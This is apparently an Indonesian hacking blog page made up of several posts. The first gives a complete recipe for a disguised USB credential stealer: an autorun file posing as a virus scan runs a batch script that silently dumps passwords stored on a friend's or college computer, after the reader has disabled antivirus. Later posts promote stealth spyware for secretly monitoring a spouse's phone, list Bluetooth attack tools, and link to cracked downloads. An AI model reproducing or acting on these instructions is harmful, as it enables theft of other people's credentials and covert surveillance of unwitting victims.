INDOhack

ZONANYA HACKER DITO

Subscribe
Add to Technorati Favourites
Add to del.icio.us


MessenPass:
Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

b]Mail PassView:
Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview:

IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView:
Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox:

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Download tool kits frm here...




MessenPass: http://www.nirsoft.net/utils/mspass.html

Mail Passview: http://www.nirsoft.net/utils/mailpv.html

IE Passview: http://www.nirsoft.net/utils/internet_ex...sword.html

Protected Storage PassView: http://www.nirsoft.net/utils/pspv.html

PasswordFox: http://www.nirsoft.net/utils/passwordfox.html

Steps
NOTE: You must temporarily disable your antivirus before following these


steps.1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it:

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

*******************************END***********************************

– How to Spy on a Cell Phone


Cell Phone SpyAre you curious to know how to spy on a cell phone? Do you want to secretly spy on SMS text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a detailed tutorial on how to spy on cell phones.
Every day I get a lot of emails from people asking how to spy on cell phone. Before you can spy on a cell phone you need to know the following facts.
1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the cell phone spy software.
2. Cell phone spy softwares are compatible with the following type of phones (operating systems).
1. Symbian OS (Most Nokia Phones)
2. Apple iphone
3. Windows Mobile
For a complete list of compatible cell phones visit the Mobile Spy site and click on Compatiblity link present on the left hand sidebar.
Today most of the modern cell phones are loaded with one of the above three operating systems and hence compatibility doesn’t pose a major problem. There exists many cell phone spy softwares on the market to accomplish this job and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy softwares and based on the results we conclude that the following cell phone spy software to be the best one.

Mobile Spy - The No.1 Cell Phone Spy Software

Mobile Spy is a perfect tool for parents to monitor their childern’s activity on thier cell phone!
Mobile Spy Features
Mobile Spy is a hybrid spy software/service which allows you to spy on your target cell phone in real time. This unique system records the activities of anyone who uses the compatible cell phone ( iPhone, Windows Mobile or Symbian OS smartphone). For this you need to install a small application onto the cell phone. This application starts at every boot of the phone but remains stealth and does not show up in the running process list. It runs in the background and will spy on every activity that takes place on the phone.
Logging Features
1. Calls Log – Each incoming and outgoing number on the phone is logged along with duration and time stamp.
2. Every text message/MMS is logged even if the phone’s logs are deleted. Includes full text.
3. The phones’s current location is frequently logged using GPS when signal is available.
4. Each address entered into Internet Explorer (or any browser) is logged.
5. This cell phone spy software works in total stealth mode. The person using the phone can never come to know about the presence of this software.
How it works
The working of Mobile Spy is very simple and needs no extra knowledge to install and use.
Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.
Step 2- Install the downloaded cell phone spy software onto any of the compatible cell phone. After installation the software starts recording all the activities on the cell phone.
Step 3- Login to your online control panel to see the logs containing the recorded information.
This is just a small list of it’s features. For a list of compatible phones, step-by-step installation guide and more details visit the following link

Mobile Spy


Why Mobile Spy?
Mobile Spy is one of the best and award winning cell phone spy softwares on the market with an affordable price. Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to perform cell phone spying. So what are you waiting for? Go grab Mobile Spy and expose the truth.

*******************************END***********************************


Bluetooth technology is great, No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?). If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them. This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices. Discovering Bluetooth Devices BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification. BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Hacking Bluetooth Devices BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. UPDATE: Hey folks, due to massive response the download links to above Mobile Hacking Premium Pack were moved to our must-have downloads page which is only available to MakeUseOf subscribers. So you will need to subscribe before youcan get them. For the Subscribers : To get your free Mobile Hacking Premium just write comment with your email address that you have used to subscribe and the above Premium Pack will be mailed to you. You need to be a subscriber to get the premium pack. Before Sending the Premium Pack we will be checking for your Authenticity. You will Receive your Premium Pack within 24 hours. What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.



WinRAR Password Remover 2.0




Advanced RAR Password Recovery is an application that helps you to recover forgotten passwords for RAR/WinRAR files. We’ve all had the experience of not using a file for a while and then forgetting the password. This problem is solved with Advanced RAR Password Recovery. With it you don’t need to keep a record of your passwords; if you forget one, you just operate the program and find.

Download


http://uploading.com/files/Y7VNGA9L/Rar_password_Remover_Priv8.rar.html

OR
http://hotfile.com/dl/8797510/3a1d99c/Rar_password_Remover_by_onel0ve.rar.html

Dramatically speed up your existing Internet broadband connection and get the best performance possible from your current Internet access. No technical questions; just one click and it’s done. Free Internet speed test software included.. Full Speed will increase your online Internet speed with everything you do: faster downloads, web browsing, data streaming, e-mail. P2P and gaming.



Features:

* Faster Internet access
* Faster download speeds
* Faster web site browsing performance
* Improve Internet and Intranet performance
* Quicker data download times
* Improved streaming music and movies
* Faster download for songs and video
* Faster performance with email
* Better download speed for all data
* Faster loading Web graphics
* Speed test for Web site browsing
* Speed test for general data transfer

Tested over:
1. T1, T3, Cable, DSL - SDSL, ADSL
2. VPN and direct wired WAN/LAN
3. P2P, Remote Desktop, File Sharing Software


Download


http://rapidshare.com/files/255235160/Full_Speed_Internet_Broadband_Connection_v3.rar